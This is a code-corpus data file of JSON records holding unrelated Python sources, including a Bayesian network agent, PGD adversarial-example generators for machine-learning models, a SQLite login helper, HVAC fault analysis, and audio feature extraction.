[var] \n            #TODO Sigma estimation\n            sig=0\n            for d in self.children[target_var].dataset:\n                if d[\"s_1\"][self.tree_var-1] == target_var :\n                    sig+=1\n            sig = sig/len(self.children[target_var].dataset)\n            opt_parents = children_parents.copy()\n            opt_parents.remove(self.tree_var)\n            #print(\"var : {}, delta : {}\".format(var, delta))\n            #self.DBN[\"cpts\"][self.tree_var].print_tree()\n            child_0.recalculate_distrib_vect()\n            child_1.recalculate_distrib_vect()\n            #create a refinement in the agent's \"correct refinement set\" only if target_var = 1 and DBN[\"var\"] = tree_var\n            if(self.DBN[\"action\"] == self.tree_var and target_var == 1):\n                self.my_agent.add_refin(self.tree_var, var)\n            self.my_agent.try_option(self.tree_var, target_var, opt_parents, sig, self.DBN[\"cpts\"][self.tree_var].children[1-target_var])\n        \n        #return a tuple (bool, var, delta, child_0, child_1)\n        def try_refinement(self, var):\n            #split dataset on the refinement var\n            dataset_0 = []\n            dataset_1 = []\n            for d in self.dataset:\n                if(d[\"s_0\"][var-1]==0):\n                    dataset_0.append(d)\n                else:\n                    dataset_1.append(d)\n            #avoid size 1 datasets because their BIC is 0 (log(1) = 0) and they refine every time\n            if(len(dataset_0) == 1 or len(dataset_1)==1):\n                return (False, None, None, None, None)\n            children_parents = self.parents_list + [var] \n            child_0 = type(self)(self.DBN, self.tree_var, self.my_agent, parents_list = children_parents, dataset =dataset_0, child_01 = 0) \n            child_1 = type(self)(self.DBN, self.tree_var, self.my_agent, parents_list = children_parents, dataset =dataset_1, child_01 = 1)\n            #if children BICs are better\n            BIC0 = child_0.compute_BIC_Mono()\n            BIC1 = child_1.compute_BIC_Mono()\n            if(BIC0 + BIC1 > self.compute_BIC_Mono()):\n                #print(\"BIC0 = {}, BIC1 = {}, my BIC = {}, var = {}, tree_var = {}\".format(BIC0, BIC1, self.compute_BIC_Mono(),var, self.tree_var))\n                #if(False):\n                #    print(\"Dataset parent\")\n                #    tmpind = 0\n                #    for d in self.dataset:\n                #        tmpind += 1\n                #        print(\"{} : {} ; {}\".format(tmpind,d[\"s_0\"],d[\"s_1\"]))\n                #    tmpind = 0\n                #    print(\"Dataset child0\")\n                #    for d in child_0.dataset:\n                #        tmpind += 1\n                #        print(\"{} : {} ; {}\".format(tmpind,d[\"s_0\"],d[\"s_1\"]))\n                #    tmpind = 0\n                ##    print(\"Dataset child1\")\n                #    for d in child_1.dataset:\n                #        tmpind += 1\n                #        print(\"{} : {} ; {}\".format(tmpind,d[\"s_0\"],d[\"s_1\"]))\n                return (True, var, BIC0+BIC1-self.BIC, child_0, child_1)\n            #no refinement\n            return (False, None, None, None, None)\n        \n        #return true if the var of the node is independent from the tree var => refinement not consistent \n        def chi_2(self):\n            refined_var = self.var\n            desc_dataset = []\n            for desc in 
self.descendants:\n                desc_dataset = desc_dataset + desc.dataset\n            n_tot=len(desc_dataset)\n            if(n_tot==0):\n                return False\n            #n_ij\n            n=[[0,0],[0,0]]\n            \n            for d in desc_dataset:\n                i=d[\"s_0\"][refined_var-1]\n                j=d[\"s_1\"][self.tree_var-1]\n                n[i][j]+=1\n            if((n[0][0]==0 or n[1][1]==0) and (n[0][1]==0 or n[1][0]==0)):\n                return True\n            chi2 = chi2_contingency(n)\n            independency = chi2[1] > (1-self.my_agent.inde_treshold)\n            #if(independency):\n                #print(chi2)\n            return(independency)\n        \n        def prune(self):\n            desc_dataset=[]\n            tmp_node = self\n            tmp_prec_node = None\n            target_value = 0\n            while(not tmp_node.parent == None):\n                tmp_prec_node = tmp_node\n                tmp_node = tmp_node.parent\n                #print(\"tmp_prec_node : {}\".format(tmp_prec_node))\n                #print(\"tmp_node.children[1] : {}\".format(tmp_node.children[1]))\n                if(tmp_node.children[0]==tmp_prec_node):\n                    target_value = 1\n\n            \n            for desc in self.descendants:\n                desc_dataset = desc_dataset + desc.dataset\n                \n                #remove refin from the refin set in the agent\n                #if(target_value==1):\n                    #print(target_value)\n                if(desc.DBN[\"action\"] == desc.tree_var and target_value == 1):\n                    #print(\"Remove ref ({},{})\".format(desc.tree_var, desc.var))\n                    self.my_agent.remove_refin(desc.tree_var, desc.var)\n                #just to be sure\n                del desc\n            \n            self.dataset=desc_dataset\n            self.leaf_distrib = 0\n            if(len(self.dataset)>0):\n                for d in self.dataset:\n                    if(d[\"s_1\"][self.tree_var-1]==1):\n                        self.leaf_distrib+=1\n                self.leaf_distrib = self.leaf_distrib / (len(self.dataset))\n            self.children=[]\n            self.recalculate_distrib_vect()\n        \n        def check_refinements(self, s_0):\n            val_on_s_0 = s_0[self.var-1] \n            #if leaf, no refinement \n            if(self.is_leaf()):\n                return False\n            \n            elif(( self.var != self.tree_var ) and self.chi_2()):\n                #print(\"Prune on DBN : {}, CPT : {}, Node of var : {}\".format(self.DBN, self.tree_var, self.var))\n                \n                tmp_target = 1-s_0[self.tree_var-1]\n                opt_root = self.DBN[\"cpts\"][self.tree_var].children[1-tmp_target]\n                #print(\"Prune on : {} in : \".format(self.var))\n                #opt_root.parent.print_tree()\n                #opt_root.print_tree()\n                #print(opt_root.used)\n                self.prune()\n                \n                if opt_root.used:\n                    self.my_agent.remove_and_recreate_option(self.tree_var, tmp_target)\n                return True\n                #TODO Option and things\n            \n            #if not leaf\n            else:\n                if(val_on_s_0==False):\n                    return(self.children[0].check_refinements( s_0))\n                else:\n                    return(self.children[1].check_refinements( s_0))\n","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":41513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"622999009","text":"import torch\r\nimport os\r\nimport torch.optim as optim\r\n\r\n\r\nclass Attack():\r\n    def __init__(self, model, eps, alpha, iters, norm, criterion, device):\r\n        self.model = model.eval()\r\n        self.eps = eps\r\n        self.iters = iters\r\n        self.norm = norm\r\n        self.device = device\r\n        self.alpha = alpha\r\n        self.criterion = criterion\r\n\r\n\r\nclass PGD(Attack):\r\n    def __call__(self, images, labels, randinit=False, inverse=1):\r\n        images = images.to(self.device).detach().clone()\r\n        labels = labels.to(self.device).detach().clone()\r\n        ori_images = images.detach().clone()\r\n\r\n        if ((randinit) and (self.norm == 10) and (self.iters > 0)):\r\n            images += (torch.rand_like(images) - .5) * self.eps * 2\r\n            images = torch.clamp(images, min=0, max=1)\r\n        if ((randinit) and (self.norm < 10) and (self.iters > 0)):\r\n            images += torch.randn_like(images) * 0.001\r\n            images = torch.clamp(images, min=0, max=1)\r\n\r\n        for i in range(self.iters):\r\n            images.requires_grad = True\r\n            outputs 
= self.model(images)\r\n            self.model.zero_grad()\r\n            loss = self.criterion(outputs, labels) * inverse\r\n            loss.backward()\r\n            #print(loss)\r\n            with torch.no_grad():\r\n                if self.norm == 10:\r\n                    adv_images = images + self.alpha * images.grad.sign()\r\n                    eta = torch.clamp(adv_images - ori_images,\r\n                                      min=-self.eps,\r\n                                      max=self.eps)\r\n                    images = torch.clamp(ori_images + eta, min=0,\r\n                                         max=1).detach_()\r\n                else:\r\n                    adv_images = images + self.alpha * images.grad / images.grad.view(\r\n                        images.shape[0], -1).norm(self.norm, dim=1).view(\r\n                            -1, 1, 1, 1)\r\n                    eta = adv_images - ori_images\r\n                    mask = eta.view(eta.shape[0], -1).norm(self.norm,\r\n                                                           dim=1) <= self.eps\r\n                    scale = eta.view(eta.shape[0], -1).norm(self.norm, dim=1)\r\n                    scale[mask] = self.eps\r\n                    eta *= self.eps / scale.view(-1, 1, 1, 1)\r\n                    images = torch.clamp(ori_images + eta, min=0,\r\n                                         max=1).detach_()\r\n        adv_images = images\r\n        return adv_images\r\n\r\n\r\nclass PGDadam(Attack):\r\n    def __call__(self, images, labels, randinit=False, inverse=1):\r\n        images = images.to(self.device).detach().clone()\r\n        labels = labels.to(self.device).detach().clone()\r\n        ori_images = images.detach().clone()\r\n\r\n        if ((randinit) and (self.norm == 10) and (self.iters > 0)):\r\n            images += (torch.rand_like(images) - .5) * self.eps * 2\r\n            images = torch.clamp(images, min=0, max=1)\r\n        if ((randinit) and (self.norm < 10) and (self.iters > 0)):\r\n            images += torch.randn_like(images) * 0.001\r\n            images = torch.clamp(images, min=0, max=1)\r\n\r\n        images.requires_grad = True\r\n        optimizer = optim.Adam([images], lr=self.alpha)\r\n        for i in range(self.iters):\r\n            optimizer.zero_grad()\r\n            outputs = self.model(images)\r\n            loss = (-1) * self.criterion(outputs, labels) * inverse\r\n            #print(loss)\r\n            loss.backward()\r\n            optimizer.step()\r\n            with torch.no_grad():\r\n                if self.norm == 10:\r\n                    eta = torch.clamp(images.detach().clone() - ori_images,\r\n                                      min=-self.eps,\r\n                                      max=self.eps)\r\n                    images.data = torch.clamp(ori_images + eta, min=0, max=1)\r\n                else:\r\n                    eta = images.detach().clone() - ori_images\r\n                    mask = eta.view(eta.shape[0], -1).norm(self.norm,\r\n                                                           dim=1) <= self.eps\r\n                    scale = eta.view(eta.shape[0], -1).norm(self.norm, dim=1)\r\n                    scale[mask] = self.eps\r\n                    eta *= self.eps / scale.view(-1, 1, 1, 1)\r\n                    images.data = torch.clamp(ori_images + eta, min=0, max=1)\r\n        return images.detach().clone()","sub_path":"PGD.py","file_name":"PGD.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"170603136","text":"import sqlite3 as sql\nfrom sqlite3.dbapi2 import Cursor\n\ndef add_data(nome, sobrenome, login, senha, email):\n    banco = sql.connect('db.db')\n\n    cursor = banco.cursor()\n    \n    cursor.execute(\"\"\"\n    INSERT INTO conta (nome, sobrenome, login, senha, email) \n    VALUES(?, ?, ?, ?, ?)\n    \"\"\", (nome, sobrenome, login, senha, email))\n    banco.commit()\n    banco.close()\n\ndef get_senha(login):\n    banco = sql.connect('db.db')\n\n    cursor = banco.cursor()\n\n    cursor.execute('SELECT senha FROM conta WHERE login = ?', (login,) )\n    retornar = cursor.fetchall()\n    banco.commit()\n    banco.close()\n    print(retornar)\n    \n\n\n    return retornar[0][0] if retornar else retornar\n\ndef login_in_data(login):\n    # returns True if the login exists, False otherwise\n    banco = sql.connect('db.db')\n\n    cursor = banco.cursor()\n\n    cursor.execute('SELECT login FROM conta WHERE login = ?', (login,) )\n    retornar = cursor.fetchall()\n    banco.commit()\n    banco.close()\n\n    print(retornar)\n    \n    return True if retornar 
else False\ndef update_msg(login, msg):\n banco = sql.connect('db.db')\n cursor = banco.cursor()\n\n cursor.execute('''\n UPDATE conta\n SET frase = ?\n WHERE login = ?\n\n ''', (msg, login))\n \n banco.commit()\n banco.close()\ndef get_msg(login):\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n\n cursor.execute('SELECT frase FROM conta WHERE login = ?', (login, ))\n retornar = cursor.fetchall()[0][0]\n banco.commit()\n banco.close()\n print(retornar)\n return retornar\n \n\n\ndef mostrar():\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n\n cursor.execute('SELECT * FROM conta')\n retornar = cursor.fetchall()\n banco.commit()\n banco.close()\n print(retornar)\n\n\nif __name__ == '__main__':\n mostrar()\n # add_data(nome='jonas3', sobrenome='teixeira', login='jonas3', senha='123', email='jonas@email.com')\n mostrar()\n print()\n # get_senha('jonas')\n # print(login_in_data('jonas'))\n # update_msg('jonas', 'esta eh uma mensagem')\n # print('=-=-=-=')\n # get_msg('jonas')\n # mostrar()\n print(get_senha('as'))","sub_path":"18-sistemaDeLogin-emDev/testes/uteis.py","file_name":"uteis.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189605750","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Scripts used to perform fault impact case studies.\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nimport load_data\nimport munge\n\nCONFIG = json.load(open('./data_model.json', 'r'))\n\n\ndef main(frame):\n \"\"\"Perform a case study for condenser and evaporator fouling service.\"\"\"\n\n # Study the impacts of simultaneous evaporator and condenser faults.\n df = munge.find_system(frame, MUL_MDOT=1.0, MUL_COND_VOL=1.3)\n\n # To avoid impacts of other faults, select data with other faults at\n # normal levels using a query.\n norm_lvls = CONFIG['Normal_Levels'].copy()\n # We don't want normal evaporator and condenser volume, so pop these.\n norm_lvls.pop('ODHX_AIR_FOUL_LVL')\n norm_lvls.pop('IDHX_AIR_FOUL_LVL')\n qry_str = ' & '.join(['{} == {}'.format(*i) for i in norm_lvls.items()])\n df = df.query(qry_str)\n\n # Modify fault impact ratios according to the seasonal impact.\n faults = ['ODHX_AIR_FOUL_LVL', 'IDHX_AIR_FOUL_LVL']\n impacts = ['R_COOL', 'R_SHR', 'R_COP', 'R_RUN', 'R_WORK', ]\n df = df.assign(R_COOL=df.R_COOL * df.SEAS_WT,\n R_SHR=df.R_SHR * df.SEAS_WT,\n R_COP=df.R_COP * df.SEAS_WT,\n R_RUN=df.R_RUN * df.SEAS_WT,\n R_WORK=df.R_WORK * df.SEAS_WT, )\n\n # TODO Multiply result by 0.5 since duplicate rows not handled correctly.\n df = df.groupby(by=faults)[impacts].aggregate(lambda x: 0.5 * np.nansum(x))\n\n return df\n\n\ndef plot_2d_impacts(df):\n\n dx, dy = 10., 10.\n y, x = np.mgrid[slice(0., 50. + dy, dy),\n slice(0., 50. + dx, dx)]\n z = 2. 
* df.R_WORK.values.reshape(y.shape[0], x.shape[1])\n\n with plt.style.context(('./academic.mplstyle')):\n fig = plt.gcf()\n axs = plt.gca()\n fig.set_size_inches(4, 3)\n plt.contourf(x, y, z, cmap=plt.get_cmap('Reds'),\n vmin=1.0, vmax=1.8)\n cb = plt.colorbar()\n plt.xlim((-2, 52))\n plt.ylim((-2, 52))\n plt.xlabel(r\"Evaporator Air Flow Reduction [\\%]\")\n plt.ylabel(r\"Condenser Air Flow Reduction [\\%]\")\n cb.set_label(r\"Energy Impact [\\%]\")\n cb.solids.set_edgecolor('face')\n cb.set_clim((1.0, 1.8))\n plt.scatter(50., 29.73, 30, c='k')\n plt.scatter(0., 29.73, 30, c='w')\n plt.scatter(50., 0., 30, c='w')\n plt.arrow(48, 29.73, -44, 0, width=0.05, fc='k')\n plt.text(25., 35, r\"Clean Evaporator:\",\n ha='center', va='bottom', fontsize=9)\n plt.text(25., 31, r\"Benefit $=$35.6\\%\",\n ha='center', va='bottom', fontsize=9)\n plt.arrow(50, 27.73, 0, -23., width=0.05, fc='k')\n plt.text(48., 17, r\"Clean Condenser:\",\n ha='right', va='center', fontsize=9)\n plt.text(48., 13, r\"Benefit $=$ 15.3\\%\",\n ha='right', va='center', fontsize=9)\n plt.savefig('./impact_contourf_plot.pdf')\n plt.savefig('./impact_contourf_plot.png', dpi=212)\n plt.close('all')\n\n\ndef plot_seas_hist():\n\n mia = load_data.load_tmy_data(722020)\n bins = np.arange(65., 135., 5.)\n\n degF = 1.8 * mia['Dry-bulb (C)'] + 32.\n\n with plt.style.context(('./academic.mplstyle')):\n degF.hist(bins=bins, figsize=(4., 3.), label='Miami TMY')\n fig = plt.gcf()\n axs = plt.gca()\n ax2 = axs.twinx()\n ax2.plot((65., 95.), (0., 1.), 'k-')\n axs.set_xlim((65., 110.))\n axs.set_xlabel('Ambient Temperature [$^\\circ$F]')\n axs.set_ylabel('Number of Hours')\n ax2.set_ylabel('Load Fraction [-]')\n axs.legend(loc='upper left')\n fig.savefig('./seas_hist_plot.pdf')\n fig.savefig('./seas_hist_plot.png', dpi=212)\n plt.close('all')\n\n\ndef calc_seas_cost(frame, tmy):\n\n elec_cost = 1.461 * 0.11 # correcting for larger compressor\n quip_cost = 0.285\n\n bins = np.arange(67.5, 112.5, 5.)\n hour = np.array((778., 1327., 2511., 2312., 838., 54., 6., 0., 0.))\n load = np.array([min(1., (x - 65.) / (95. 
- 65.)) for x in bins])\n\n system = {'MUL_MDOT': 1., 'MUL_COND_VOL': 1.3}\n norm = munge.find_normal(munge.find_system(frame, **system))\n\n power = ['COMP_ELEC_IN_PWR', 'ODF_ELEC_IN_PWR', 'IDF_ELEC_IN_PWR']\n norm_energy = 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9])\n norm_run = sum(hour * load)\n print('{:6.2f} kWh, {:6.2f} h'.format(norm_energy, norm_run))\n print('${:6.2f}, ${:6.2f} h'.format(elec_cost * norm_energy,\n quip_cost * norm_run))\n\n # Case 0: Condenser Fault: 30%, Evaporator Fault: 50%\n case_0 = munge.find_fault_scenario(munge.find_system(frame, **system),\n 100., 30., 50., 0., 0., 0.)\n case_0_energy = \\\n 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9].values *\n case_0.R_WORK.iloc[:9].values)\n case_0_run = \\\n sum(hour * load * case_0.R_RUN.iloc[:9])\n print('{:6.2f} kWh, {:6.2f} h'.format(case_0_energy, case_0_run))\n print('${:6.2f}, ${:6.2f}'.format(elec_cost * (case_0_energy - norm_energy),\n quip_cost * (case_0_run - norm_run)))\n\n # Case 1: Condenser Fault: 0%, Evaporator Fault: 50%\n case_1 = munge.find_fault_scenario(munge.find_system(frame, **system),\n IDHX_AIR_FOUL_LVL=50.)\n case_1_energy = \\\n 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9].values *\n case_1.R_WORK.iloc[:9].values)\n case_1_run = \\\n sum(hour * load * case_1.R_RUN.iloc[:9])\n print('{:6.2f} kWh, {:6.2f} h'.format(case_1_energy, case_1_run))\n print('${:6.2f}, ${:6.2f}'.format(elec_cost * (case_1_energy - norm_energy),\n quip_cost * (case_1_run - norm_run)))\n\n # Case 2: Condenser Fault: 30%, Evaporator Fault: 0%\n case_2 = munge.find_fault_scenario(munge.find_system(frame, **system),\n ODHX_AIR_FOUL_LVL=30.)\n case_2_energy = \\\n 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9].values *\n case_2.R_WORK.iloc[:9].values)\n case_2_run = \\\n sum(hour * load * case_2.R_RUN.iloc[:9])\n print('{:6.2f} kWh, {:6.2f} h'.format(case_2_energy, case_2_run))\n print('${:6.2f}, ${:6.2f}'.format(elec_cost * (case_2_energy - norm_energy),\n quip_cost * (case_2_run - norm_run)))\n\n return bins, hour, load, norm\n\n\nif __name__ == '__main__':\n\n from load_data import load_data_store\n from process import calculate_impacts, assign_seasonal_weight\n\n data_path = '/home/andrew/data/fault_sim_v25/'\n try:\n store = load_data_store(data_path, use_xlsx=False)\n frame = store.SHEN_PKGD_3TON_FXO_R410A.copy()\n frame = assign_seasonal_weight(calculate_impacts(frame))\n print(main(frame))\n except Exception as e:\n print(\"Terminated with error: {}\".format(e))\n finally:\n store.close()\n","sub_path":"fault_sim_analysis/case_study.py","file_name":"case_study.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"14312450","text":"from cosmosis.datablock import names, option_section\nimport os\nimport numpy as np\n\n\ndirname = os.path.split(__file__)[0]\n\n\ndef setup(options):\n mass = options[option_section, \"mass\"]\n if mass not in ['low', 'high']:\n raise ValueError(\"Please choose low or high mass for Jullo likelihood\")\n data = np.loadtxt(os.path.join(dirname, \"jullo_data.txt\")).T\n if mass == \"low\":\n data = data[0], data[1], data[2]\n else:\n data = data[0], data[3], data[4]\n return data, mass\n\n\ndef execute(block, config):\n data, mass = config\n z_obs, b_obs, sigma_obs = data\n # Load the bias from the block\n try:\n z = block[names.bias_field, \"z\"]\n except:\n raise ValueError(\n \"The Jullo data requires bias as a function of redshift\")\n 
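# NB: \"b\" may be stored as b(z) or on a (k_h, z) grid; the 2D case is collapsed\n    # below by taking the slice at the smallest k_h value.\n    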
b = block[names.bias_field, \"b\"]\n\n # Just use smallest k value for 2D\n if b.ndim == 2:\n k, z, b = block.get_grid(names.bias_field, \"k_h\", \"z\", \"b\")\n b = b[0]\n\n # interpolate into it at the data z\n b_theory = np.interp(z_obs, z, b)\n\n # get likelihood\n chi2 = ((b_theory - b_obs)**2 / sigma_obs**2).sum()\n like = -0.5 * chi2\n block[names.likelihoods, \"jullo_like\"] = like\n\n return 0\n\n\ndef cleanup(config):\n pass\n","sub_path":"cosmosis-standard-library/likelihood/jullo_bias/jullo.py","file_name":"jullo.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"350539487","text":"from ._builtin import Page, WaitPage\r\nfrom otree.api import Currency as c, currency_range\r\nfrom .models import Constants\r\n\r\n\r\nclass Results(Page):\r\n \"\"\"Players payoff: How much each has earned\"\"\"\r\n def vars_for_template(self):\r\n # Set payoffs\r\n self.player.random_payoffs()\r\n # Display\r\n participant = self.participant\r\n session = self.session\r\n player = self.player\r\n return {\r\n 'Color1': session.vars['Color1'],\r\n\r\n 'Contribution1': participant.vars['Contribution1'],\r\n 'Total_contribution1': session.vars['Total_contribution1'],\r\n 'UrnB1': session.vars['UrnB1'],\r\n 'UrnA1': participant.vars['UrnA1'],\r\n 'Initial1': session.vars['Initial1'],\r\n 'Total1': participant.vars['Total1'],\r\n 'Autre_contribution1': session.vars['Total_contribution1'] - participant.vars['Contribution1'],\r\n\r\n 'Contribution2' : participant.vars['Contribution2'],\r\n 'Total_contribution2' : session.vars['Total_contribution2'],\r\n 'UrnB2' : session.vars['UrnB2'],\r\n 'UrnA2' : participant.vars['UrnA2'],\r\n 'Initial2' : session.vars['Initial2'],\r\n 'Total2' : participant.vars['Total2'],\r\n 'Autre_contribution2' : session.vars['Total_contribution2'] - participant.vars['Contribution2'],\r\n\r\n 'Proba_1' : participant.vars['proba_1'],\r\n 'Proba_2' : participant.vars['proba_2'],\r\n 'Choix_player_ligne' : participant.vars['choix_player_ligne'],\r\n 'Realisation_Holt_Laury' : participant.vars['realisation_Holt_Laury'][0],\r\n\r\n }\r\n\r\n\r\n\r\n\r\nclass PaymentInfo(Page):\r\n\r\n def vars_for_template(self):\r\n participant = self.participant\r\n return {\r\n 'redemption_code': participant.label or participant.code,\r\n }\r\n\r\n\r\npage_sequence = [#Results,\r\n PaymentInfo]\r\n","sub_path":"Mturk/payment_info_1/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"54695178","text":"import datetime\n\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import WorkDay\n\n\n@login_required\ndef show_log(request):\n now = datetime.datetime.now()\n if request.method == 'POST':\n if request.POST['action'] == 'start':\n if not WorkDay.objects.filter(startTime__date=now.date()):\n new_day = WorkDay.objects.create(startTime=now,\n user=request.user)\n\n if request.method == 'POST':\n if request.POST['action'] == 'finish':\n if WorkDay.objects.filter(startTime__date=now.date(),\n user=request.user):\n new_day = WorkDay.objects.get(startTime__date=now.date(),\n user=request.user)\n new_day.finishTime = now\n new_day.save()\n\n work_days = WorkDay.objects.filter(\n user=request.user\n ).filter(startTime__year=now.year,\n startTime__month=now.month).order_by('startTime')\n\n days_finished = [day for day in 
work_days if day.finishTime]\n    seconds_should = 32400 * len(days_finished)\n    seconds_worked = sum(day.workday_in_seconds for day in days_finished)\n    seconds_diff = seconds_worked - seconds_should\n    if seconds_diff >= 0:\n        readable_total = '+{}'.format(str(datetime.timedelta(seconds=seconds_diff))[:4])\n    else:\n        readable_total = '-{}'.format(str(datetime.timedelta(seconds=abs(seconds_diff)))[:4])\n    context = {\n        'now': now,\n        'work_days': work_days,\n        'readable_total': readable_total\n    }\n    return render(request, 'show-log.html', context)\n\n\n@login_required\ndef index(request):\n    return render(request, 'index.html')\n","sub_path":"worklog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"207361280","text":"import datetime\n\nimport pytest\n\nfrom essentials_kit_management.storages.form_storage_implementation import \\\n    FormStorageImplementation\n\nfrom essentials_kit_management.interactors.storages.dtos import (\n    GetFormItemDtoWithSectionId, GetFormBrandDtoWithItemId\n    )\n\n\n@pytest.mark.django_db\ndef test_get_brand_dtos_with_valid_details_return_dtos(populate_data):\n\n    # Arrange\n    item_dtos = [\n        GetFormItemDtoWithSectionId(\n            item_id=1,\n            name=\"item1\",\n            description=\"item1\",\n            section_id=1),\n        GetFormItemDtoWithSectionId(\n            item_id=2,\n            name=\"item2\",\n            description=\"item2\",\n            section_id=1)]\n\n    expected_brand_dtos = [\n        GetFormBrandDtoWithItemId(\n            brand_id=1,\n            name=\"brand1\",\n            min_quantity=1,\n            max_quantity=5,\n            price_per_item=100,\n            item_id=1),\n        GetFormBrandDtoWithItemId(\n            brand_id=2,\n            name=\"brand2\",\n            min_quantity=2,\n            max_quantity=8,\n            price_per_item=200,\n            item_id=1),\n        GetFormBrandDtoWithItemId(\n            brand_id=3,\n            name=\"brand3\",\n            min_quantity=3,\n            max_quantity=9,\n            price_per_item=300,\n            item_id=2)\n        ]\n\n    storage = FormStorageImplementation()\n\n    # Act\n    actual_brand_dtos = storage.get_brand_dtos(item_dtos=item_dtos)\n\n    # Assert\n    assert actual_brand_dtos == expected_brand_dtos\n","sub_path":"essentials_kit_management/tests/storages/test_get_brand_dtos.py","file_name":"test_get_brand_dtos.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"177418537","text":"# -*- coding: utf-8 -*-\n\n# Feature extraction\nimport librosa\nfrom Vad import Vad\nimport numpy as np\n\nclass Feature(object):\n\n    def __init__(self, filename):\n        self.filename = filename\n    \n    def getFeature(self):\n        #endpoint detection (VAD)\n        vad = Vad(self.filename)\n        newVoice = vad.getNewVoice()\n        \n        y, sr = librosa.load(newVoice)\n        #compute the MFCCs\n        ccc = librosa.feature.mfcc(y=y, sr=sr)\n        #eigenvector of the MFCC matrix associated with its largest eigenvalue\n        A = np.mat(ccc)\n        B = A * A.T;\n        a,b=np.linalg.eig(B)\n        m = np.argmax(a);\n        \n        ccc1 = np.array(b[m].tolist()[0])\n        \n        #energy features\n        #S, phase = librosa.magphase(librosa.stft(y))\n        S = librosa.magphase(librosa.stft(y, window=np.ones, center=False))[0]\n        rms = librosa.feature.rmse(S=S)\n        rms_max = np.max(rms[0])\n        rms_min = np.min(rms[0])\n        rms_mean = np.mean(rms[0])\n        rms_std = np.std(rms[0])\n        \n        #zero-crossing rate\n        rate = librosa.feature.zero_crossing_rate(y)\n        rete_max = np.max(rate)\n        rate_mean = np.mean(rate)\n        rate_std = np.std(rate)\n        \n# =============================================================================\n#         S = np.abs(librosa.stft(y))\n#         chroma = librosa.feature.chroma_stft(S=S, sr=sr)\n#         A = np.mat(chroma)\n#         B = A * A.T\n#         a,b=np.linalg.eig(B)\n#         m = np.argmax(a);\n#         chroma1 = 
np.array(b[m].tolist()[0])\n# =============================================================================\n \n # pitch = Pitch(newVoice, sr)\n # pitches = np.array(pitch.getPitch())\n # pitch_max = np.max(pitches)\n # pitch_mean = np.mean(pitches)\n # pitch_std = np.std(pitches)\n # result3 = np.array([pitch_max, pitch_mean, pitch_std])\n\n\n # melEnergy = MelEnergy(newVoice)\n # melEnergys = melEnergy.getMelEnergy()\n\n e = librosa.estimate_tuning(y=y, sr=sr)\n\n # mel = librosa.feature.melspectrogram(y=y, sr=sr)\n # A = np.mat(mel)\n # B = A * A.T;\n # a, b = np.linalg.eig(B)\n # m = np.argmax(a);\n # mel1 = np.array(b[m].tolist()[0])\n\n # odf = librosa.onset.onset_strength(y=y, sr=sr, hop_length=512)\n # ac = librosa.autocorrelate(odf, max_size=4 * sr / 512)\n # ac_min = np.min(ac)\n # ac_max = np.max(ac)\n # ac_mean = np.mean(ac)\n # ac_std = np.std(ac)\n\n result1 = np.array([e, rms_max,rms_min,rms_mean,rms_std,rete_max,rate_mean,rate_std])\n result2 = ccc1\n #result3 = melEnergys\n result = np.append(result1,result2)\n # result = np.append(result,mel1)\n return result\n \n \n \n \n \n","sub_path":"src/com/module/recognition/pythonCode/Feature.py","file_name":"Feature.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380469553","text":"# coding: utf-8\nimport logging\nfrom contextlib import contextmanager\n\nfrom aleph.core import get_graph\nfrom aleph.graph.schema import NodeType\nfrom aleph.graph.entities import load_entities, load_entity, remove_entity # noqa\nfrom aleph.graph.collections import load_collection, remove_collection # noqa\nfrom aleph.graph.documents import load_documents, load_document, remove_document # noqa\nfrom aleph.graph.mapping import Mapping # noqa\n\nlog = logging.getLogger(__name__)\n\n\ndef upgrade_graph():\n graph = get_graph()\n if graph is None:\n return\n # graph.delete_all()\n cur = graph.run(\"MATCH (n) WHERE NOT (n)--() DELETE n;\")\n log.debug(\"Deleted %(nodes_deleted)s orphan nodes.\", cur.stats())\n\n for node_type in NodeType.all():\n node_type.ensure_indices(graph)\n\n\n@contextmanager\ndef transaction():\n graph = get_graph()\n if graph is None:\n yield None\n else:\n # this produces deadlocks en masse:\n # tx = graph.begin()\n # yield tx\n # tx.commit()\n yield graph\n\n\ndef test():\n from aleph.model import Entity\n graph = get_graph()\n tx = graph.begin()\n for entity_id in Entity.all_ids():\n remove_entity(tx, entity_id)\n tx.commit()\n\n # # from py2neo.database.cypher import cypher_repr\n # graph = get_graph()\n # collections = range(1, 100)\n # collections = [251]\n # # collections = cypher_repr(collections)\n # # print cypher_repr(u\"huhu this has ' quotäää\")\n # # return\n # q = \"MATCH (n:Entity)-[r]-(d:Document) \" \\\n # \"MATCH (n)-[:PART_OF]->(c1:Collection) \" \\\n # \"MATCH 